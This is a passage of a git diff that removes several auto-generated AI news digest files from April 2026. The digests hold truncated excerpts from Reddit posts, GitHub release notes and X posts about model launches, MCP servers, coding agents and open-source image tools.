[https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3) V3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also. Essentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything - ---- - -## [Goose v1.32.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.32.0) -*GitHub Releases · Goose* | 23/04/2026 | Score: 0.76 -Tags: api_update - -> ## ✨ Features - Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487) - Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647) - @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571) - `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600) - Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745) - Auto-compaction for goose2 context window - ---- - -## [Qwen Code v0.15.1 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1) -*GitHub Releases · Qwen Code* | 23/04/2026 | Score: 0.62 -Tags: cli_tool - -> ## What's Changed * fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525 * feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512 * fix(cli): stop slash completion render loop by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3533 * chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541 **Full C - ---- - -## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/) -*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.54 -Tags: open_source - -> 
I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: * Motif-Video 2B * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V. * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests. * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B) https://reddit.com - ---- - diff --git a/data/digest-2026-04-25.md b/data/digest-2026-04-25.md deleted file mode 100644 index 75d068b..0000000 --- a/data/digest-2026-04-25.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-25** | 15 stories | Auto-generated from 689 archived stories - ---- - -## [Stop switching tabs for prompting. I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse](https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/) -*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 -Tags: mcp, open_source - -> If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session. I built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. 
Instead o - ---- - -## [Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)](https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/) -*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove - ---- - -## [Qwen Code v0.15.2 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2) -*GitHub Releases · Qwen Code* | 24/04/2026 | Score: 0.94 -Tags: mcp, cli_tool - -> ## What's Changed * fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559 * feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540 * fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534 * fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe - ---- - -## [Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)](https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/) -*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.86 -Tags: mcp, agent_tool - -> I built Coyns with Claude over the past several months. 
It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. Agents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. What Claude helped me bu - ---- - -## [Gemini CLI v0.39.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1) -*GitHub Releases · Gemini CLI* | 24/04/2026 | Score: 0.70 -Tags: cli_tool, tool_update - -> **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1 - ---- - -## [Claude estimates work in human time, not Claude time](https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/) -*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.62 -Tags: developer_tool, cli_tool - -> Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes. Sometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours. I get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa - ---- - -## [Crush v0.62.1 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.1) -*GitHub Releases · Crush* | 24/04/2026 | Score: 0.62 -Tags: api_update, open_source - -> # Stability release Open Source :tm: is all about community, and this release got some nice contributions from our loved users! ## MiniMax fix Crush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work. For context, MiniMax does not have an endpoint to validate API keys. 
We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix. Kudos to @flynn-eye for the help with this one! ## Fantasy fix @carsonfarmer made [ - ---- - -## [Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need](https://x.com/karpathy) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: mcp - -> Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools. - ---- - -## [AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed](https://x.com/ayirpelle/status/2029840518272975205) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: agent_tool - -> A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization. - ---- - -## [GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago](https://x.com/mercor_ai/status/2047859197593911522) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: api_update - -> GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years. - ---- - -## [ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again](https://x.com/GrishinRobotics/status/2047760472204546230) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: open_source - -> ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale. 
- ---- - -## [Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War](https://x.com/SakanaAILabs/status/2047849392808624332) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: product_launch - -> Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war. - ---- - -## [@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap](https://x.com/Scobleizer/status/2047736381162901665) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: tool_update - -> Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility. - ---- - -## [@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw](https://x.com/NousResearch/status/2047840294406627659) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: product_launch - -> Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor. - ---- - -## [@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs PDF, Submits to Schwab](https://x.com/jxnlco/status/2047874586310766864) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: agent_tool - -> Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms. 
- ---- - diff --git a/data/digest-2026-04-26.md b/data/digest-2026-04-26.md deleted file mode 100644 index d9786e3..0000000 --- a/data/digest-2026-04-26.md +++ /dev/null @@ -1,127 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-26** | 15 stories | Auto-generated from 311 archived stories - ---- - -## [I built a free package manager for Claude Code MCP servers (open source)](https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source, developer_tool, cli_tool - -> **What I built** Every time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \`\~/.claude.json\`, restart. So I built **cgcone** to make it one command. `npm install -g @cgcone``/cli` `cgcone install context7` `cgcone install brave-search` That's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. **How Claude Code - ---- - -## [GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex](https://x.com/OpenAIDevs/status/2047377292981383662) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: api_update, tool_update, agent_tool - -> GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks. - ---- - -## [I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback](https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> I built **Impact Graph MCP** using Claude Code. 
It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”* **What it does:** You give it a function name, file path, or module, and it returns: * Direct and indirect dependents * Risk score (0–100) and risk factors * Which system layers are affected (API, auth, frontend, etc.) * Decision-oriented guidance: recommended strategy, suggested t - ---- - -## [DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race](https://x.com/ArtificialAnlys/status/2047547434809880611) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race. - ---- - -## [Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…](https://x.com/AmaniBisimwa4/status/2048370790333046822) -*X / @amanibisimwa4* | 26/04/2026 | Score: 1.00 -Tags: mcp, agent_tool - -> Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. Thanks to everyone who joined - ---- - -## [Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.](https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.86 -Tags: mcp, open_source - -> I've been using claude code daily and kept hitting the same wall, it would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. 
single. session. I measured it one day , 27,292 tokens before it wrote a single line of code, so I built **Fullerenes** `npx fullerenes init` maps your codebase into a local sqlite graph. agents query it over MCP instead of reading raw files from scratch. 27,292 → 919 tokens. same understanding. It has several oth - ---- - -## [GPT-5.5 is now available in the API. - -The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.](https://x.com/OpenAIDevs/status/2047742566410736090) -*X / @openaidevs* | 24/04/2026 | Score: 0.86 -Tags: api_update, product_launch - -> GPT-5.5 is now available in the API. The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries. - ---- - -## [huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models](https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/) -*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> This looks interesting. This is a quick summary according to Gemini: "Think of ML Intern as a "junior machine learning engineer" that lives inside your computer. While a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an "agent," meaning it doesn't just talk; it takes action. What it actually does for you: Reads the "Homework": If you tell it to use a new technique from a scientific paper, it will - ---- - -## [Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care](https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.78 -Tags: api_update, mcp - -> Cloudflare wrapped Agents Week last week. 
The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch. What I can't - ---- - -## [Most image managers suck for AI. I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!](https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/) -*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.70 -Tags: open_source, tool_update - -> **GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault) Be sure to check out all of the other details and images on the GitHub page. Hey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**. A few things it does: * **One-Click Import:** Use the include - ---- - -## [OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now](https://x.com/LoicBerthelot/status/2047690512199540959) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: developer_tool - -> The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. Mercury is trying to combine both. 
- ---- - -## [AI agent burnout is real — what it means for careers in an AI-augmented workplace](https://x.com/Chengdavid923/status/2048451643298218069) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: agent_tool - -> The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like. - ---- - -## [GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…](https://x.com/genxproapp/status/2048454195716497743) -*X / @genxproapp* | 26/04/2026 | Score: 1.00 -Tags: mcp - -> GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app. - ---- - -## [Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:](https://x.com/FSEvolved/status/2048447077705830600) -*X / @fsevolved* | 26/04/2026 | Score: 1.00 -Tags: api_update - -> Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up: - ---- - -## [United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. 
The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…](https://x.com/H_Mhatre_/status/2048359364902170792) -*X / @h_mhatre_* | 26/04/2026 | Score: 1.00 -Tags: open_source - -> United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks. - ---- - diff --git a/data/digest-2026-04-27.md b/data/digest-2026-04-27.md deleted file mode 100644 index d04527e..0000000 --- a/data/digest-2026-04-27.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-27** | 15 stories | Auto-generated from 683 archived stories - ---- - -## [(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes](https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 -Tags: product_launch, open_source, github_release, tool_update - -> **GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault) **Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1) I resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee - ---- - -## [Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. 
Alibaba's bigges…](https://x.com/bridgemindai/status/2048816878454194460) -*X / @bridgemindai* | 27/04/2026 | Score: 1.00 -Tags: api_update, open_source, agent_tool - -> Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less - ---- - -## [A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…](https://x.com/0xAirr/status/2048663698806620544) -*X / @0xairr* | 27/04/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP - ---- - -## [how to build a persistent memory layer like recall?](https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/) -*Reddit r/ClaudeAI* | 27/04/2026 | Score: 1.00 -Tags: api_update, mcp - -> I've been testing recall 2.0 and their context layer is exactly what i want. it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse - ---- - -## [it’s been a good run... 
rip my stable diffusion setup (+ Raven fanart)](https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 -Tags: api_update, tool_update - -> i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services. on top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build. anyway, i wa - ---- - -## [Built an MCP connector for official Python docs .. no API keys, no unofficial sources](https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/) -*Reddit r/ClaudeAI* | 27/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment. [https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server) The core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs. I built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and - ---- - -## [OpenClaw v2026.4.25 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.25) -*GitHub Releases · OpenClaw* | 27/04/2026 | Score: 0.78 -Tags: developer_tool, cli_tool - -> ## 2026.4.25 ### Highlights - Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. 
Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth. - Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov - ---- - -## [Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders](https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time. Stack: SDXL for backgrounds, optional AnimateDiff (fair warning: \~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. UI runs in Gradio locally. AnimateDiff integration was the most painful p - ---- - -## [PixlStash 1.1.0 is now available!](https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.70 -Tags: product_launch, open_source - -> [PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections. The main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well: * Automatic import folders in the UI along with the reference folders * Statistics sidebar that shows - ---- - -## [Is anyone working on a ComfyUI node for the new Ideogram LoRA API? 
(They call it Custom Model)](https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.62 -Tags: api_update, developer_tool - -> I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀 But, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? I'd love to be - ---- - -## [NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever](https://x.com/JoseCSancho/status/2048587841882439784) -*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today. - ---- - -## [NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap](https://x.com/AIKumarvels/status/2048294442063970777) -*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute. - ---- - -## [OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. 
The model is built for agentic tasks and ease of use: GPT-5.5 fig…](https://x.com/News_pulse360/status/2048733780744278450) -*X / @news_pulse360* | 27/04/2026 | Score: 1.00 -Tags: product_launch - -> OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do - ---- - -## [OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…](https://x.com/AlternativeTo/status/2048666474181808532) -*X / @alternativeto* | 27/04/2026 | Score: 1.00 -Tags: product_launch - -> OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ … - ---- - -## [two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…](https://x.com/witcheer/status/2048665173326532861) -*X / @witcheer* | 27/04/2026 | Score: 1.00 -Tags: product_launch - -> two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. 
V4-Pro at $1.74/$3.48, - ---- - diff --git a/data/digest-2026-04-28.md b/data/digest-2026-04-28.md deleted file mode 100644 index e1c579c..0000000 --- a/data/digest-2026-04-28.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-28** | 15 stories | Auto-generated from 683 archived stories - ---- - -## [Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors](https://x.com/NousResearch/status/2047518675163636112) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source, developer_tool, tool_update, agent_tool - -> Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. The release is the largest update to the framework to date. - ---- - -## [Qwen Code sdk-typescript-v0.1.7 released](https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7) -*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.94 -Tags: api_update, github_release, developer_tool, cli_tool - -> ## Bundled CLI Version This SDK release bundles CLI version: 0.15.3 Source: latest stable CLI from npm --- ## Bundled CLI Version This SDK release bundles CLI version: 0.13.1 Source: latest stable CLI from npm --- > Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation). ## What's Changed * chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632 * chore(release): sdk-typescript v0.1.4 by @qwen-c - ---- - -## [Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…](https://x.com/CrowdStrike/status/2049179351837512138) -*X / @crowdstrike* | 28/04/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> Is your security team struggling to monitor AI agent activity in SaaS environments? 
We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. Track administrative changes, tool - ---- - -## [Gemini Launches Agentic Trading on a Regulated US Exchange](https://x.com/xHub_AI/status/2049131460460745232) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world. - ---- - -## [NVIDIA Ships One Model That Replaces Vision Speech and Text Chain](https://x.com/benitoz/status/2049168050495053924) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights. - ---- - -## [Warp Terminal Goes Open Source](https://x.com/zeddotdev/status/2049167033275728343) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure. - ---- - -## [NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI](https://x.com/ainews_24_7/status/2049178579510956193) -*X / @ainews_24_7* | 28/04/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> NEWS: AWS and OpenAI officially announce their partnership. 
